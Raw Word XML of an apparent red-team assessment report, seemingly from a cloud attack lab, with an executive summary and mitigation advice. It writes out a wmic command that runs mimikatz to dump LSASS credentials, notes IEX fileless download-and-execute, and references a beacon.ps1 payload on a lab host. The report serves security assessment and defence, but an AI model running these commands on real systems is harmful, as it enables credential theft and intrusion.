            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">LID001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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PowerShell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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Fileless execution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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Downloaded and executed script directly into memory via IEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5467350" cy="2533650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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467350" cy="2533650"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the mimikatz come into action for credential dumping or harvesting. First run “privilege::debug” for the admin rights checks. Or inputting every command manually one by run we can run this in the powershell “wmic process call create "C:\path\to\mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' exit". Executed a Living-off-the-Land attack by leveraging WMI to invoke Mimikatz remotely on the target system. By utilizing native Windows management tools, the attack successfully bypassed standard process monitoring to dump the LSASS memory space. This facilitated the harvesting of clear-text credentials and NTLM hashes for further lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our assessment identified a critical security gap where human-centric vulnerabilities and technical misconfigurations could be chained to compromise the organization’s cloud data. By simulating a sophisticated phishing campaign, we successfully bypassed multi-factor authentication and gained internal access. From there, we leveraged native Windows administrative tools to remain undetected while escalating privileges within the AWS environment. This culminated in the successful extraction of sensitive mock data. To mitigate these risks, we recommend immediate enforcement of hardware-based security keys, stricter IAM 'Least Privilege' policies, and enhanced monitoring for anomalous PowerShell activity across the network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-Technical Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The simulation successfully demonstrated a complete breach lifecycle, proving that current defenses are vulnerable to multi-stage cloud attacks. While the internal security team (Blue Team) correctly identified early-stage scanning, the more sophisticated phases—including encrypted communications and privilege escalation—remained largely undetected. The primary takeaway is that technical defenses alone are insufficient if identity management is weak. By implementing our recommended 'Zero Trust' architecture and refining detection rules for native Windows processes, the organization can significantly increase the cost and complexity for a real adversary to succeed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId13" w:type="default"/>
      <w:footerReference r:id="rId14" w:type="default"/>
      <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
      <w:pgMar w:bottom="566.9291338582677" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677" w:header="170.07874015748033" w:footer="283.4645669291338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F">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E">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:drawing>
        <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
          <wp:extent cx="6867525" cy="808088"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="4"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6867525" cy="808088"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">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192.168.204.130/beacon.ps1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xm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tryhackme.com/room/introductiontocloudgoat" TargetMode="External"/><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